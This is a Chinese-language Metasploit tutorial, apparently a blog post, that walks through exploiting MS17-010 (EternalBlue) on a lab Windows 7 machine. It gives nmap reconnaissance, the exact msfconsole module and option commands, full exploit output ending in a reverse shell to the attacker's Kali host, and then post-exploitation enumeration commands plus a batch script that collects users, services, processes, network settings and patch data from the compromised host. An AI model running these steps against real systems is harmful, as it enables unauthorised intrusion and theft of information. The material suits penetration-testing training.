一、Metasploit介绍
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。
二、使用(以MS17-010为例)
2.1准备环境
Kali-Linux
(base) root@kali:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.91.156 netmask 255.255.255.0 broadcast 192.168.91.255
inet6 fe80::20c:29ff:febf:3a23 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:bf:3a:23 txqueuelen 1000 (Ethernet)
RX packets 96 bytes 17375 (16.9 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 38 bytes 3529 (3.4 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
device interrupt 19 base 0x2000
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 28 bytes 1516 (1.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 28 bytes 1516 (1.4 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Windows7-SP1
Windows7SP1
2.2目标主机信息收集
测试网络连通性
测试网络连通性
端口探测:
(base) root@kali:~# nmap -O 192.168.91.129
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-22 03:06 EDT
Nmap scan report for 192.168.91.129
Host is up (0.0014s latency).
Not shown: 987 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
3389/tcp open ms-wbt-server
5357/tcp open wsdapi
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49159/tcp open unknown
MAC Address: 00:0C:29:7B:61:47 (VMware)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.78 seconds
我们可以看到目标主机开放了非常多的端口,我们选用445端口作为入侵点,来对主机进行攻击。使用的漏洞为2017年异常火爆的永恒之蓝。此漏洞攻击利用程序(exp)已在Metasploit中集成。
2.3开始攻击
打开Kali-Linux命令行,输入【msfconsole】打开Metasploit。
(base) root@kali:~# msfconsole
___ ____
,-"" `. < HONK >
,' _ e )`-._ / ----
/ ,' `-._<.===-'
/ /
/ ;
_ / ;
(`._ _.-"" ""--..__,' |
<_ `-"" \
<`- :
(__ <__. ;
`-. '-.__. _.' /
\ `-.__,-' _,'
`._ , /__,-'
""._\__,'< <____
| | `----.`.
| | \ `.
; |___ \-``
\ --<
`.`.<
`-'
=[ metasploit v5.0.88-dev ]
+ -- --=[ 2013 exploits - 1093 auxiliary - 343 post ]
+ -- --=[ 566 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Search can apply complex filters such as search cve:2009 type:exploit, see all the filters with help search
msf5 >
使用【search ms17-010】搜索永恒之蓝利用程序
msf5 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
我们首先使用序号1的模块对目标主机进行扫描,确认是否存在MS17-010漏洞
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
使用【show options】查看使用此模块需要设置的参数,可以看到需要设置rhosts和rport两个参数。其中rhosts参数为目标主机的IP地址。
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.91.129
rhosts => 192.168.91.129
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rport 445
rport => 445
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.91.129:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.91.129:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
我们设置完之后输入【run】或者【exploit】运行此程序即可。
在这个例子里显示
[+] 192.168.91.129:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.91.129:445 - Scanned 1 of 1 hosts (100% complete)
表示程序存在此漏洞。
我们使用上图中标红的的exploit模块来对目标主机进行攻击
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
参数设置完就可以攻击了。
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.91.129 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
可以用run命令或者exploit命令运行:
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.91.156:4444
[*] 192.168.91.129:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.91.129:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.91.129:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.91.129:445 - Connecting to target for exploitation.
[+] 192.168.91.129:445 - Connection established for exploitation.
[+] 192.168.91.129:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.91.129:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.91.129:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.91.129:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.91.129:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.91.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.91.129:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.91.129:445 - Sending all but last fragment of exploit packet
[*] 192.168.91.129:445 - Starting non-paged pool grooming
[+] 192.168.91.129:445 - Sending SMBv2 buffers
[+] 192.168.91.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.91.129:445 - Sending final SMBv2 buffers.
[*] 192.168.91.129:445 - Sending last fragment of exploit packet!
[*] 192.168.91.129:445 - Receiving response from exploit packet
[+] 192.168.91.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.91.129:445 - Sending egg to corrupted connection.
[*] 192.168.91.129:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.91.156:4444 -> 192.168.91.129:49216) at 2020-05-22 03:36:03 -0400
[+] 192.168.91.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.91.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.91.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
C:\Windows\system32>
弹出C:\Windows\system32的话就表示我们攻击成功了。
然后我们收集一下目标主机的主机信息
kali 解决Metasploit拿到shell后显示中文乱码问题
解决乱码问题
chcp 65001
三、常用信息收集命令
3.1whoami 查看当前用户的权限
3.2查询网络配置信息
执行ipconfig /all 获取本机网络配置信息
查询操作系统版本和版本信息使用systeminfo
3.3查询本机服务信息
wmic service list brief
3.4查询进程列表和进程信息
tasklist
wmic process list brief
3.5查看启动程序信息
wmic startup get command,caption
3.6查看主机开机时间
net statistics workstation
3.7查询用户列表
net user
获取本地管理员
net localgroup administrators
查看当前在线用户
query user || qwinsta
3.8查看补丁列表
wmic qfe get Caption,Description,HotFixID,InstalledOn
3.9自动收集信息
为了提高信息收集效率,可以创建一个脚本,在目标主机上完成相对应信息的收集工作。打开记事本输入以下命令,另存为文件格式.bat的文件,会自动收集目标主机的信息并输出为html。
for /f "delims=" %%A in ('dir /s /b %WINDIR%\system32\*htable.xsl') do set "var=%%A"
wmic process get CSName,Description,ExecutablePath,ProcessId /format:"%var%" >> out.html
wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:"%var%" >> out.html
wmic USERACCOUNT list full /format:"%var%" >> out.html
wmic group list full /format:"%var%" >> out.html
wmic nicconfig where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress /format:"%var%" >> out.html
wmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace /format:"%var%" >> out.html
wmic netuse list full /format:"%var%" >> out.html
wmic qfe get Caption,Description,HotFixID,InstalledOn /format:"%var%" >> out.html
wmic startup get Caption,Command,Location,User /format:"%var%" >> out.html
wmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:"%var%" >> out.html
wmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory /format:"%var%" >> out.html
wmic Timezone get DaylightName,Description,StandardName /format:"%var%" >> out.html
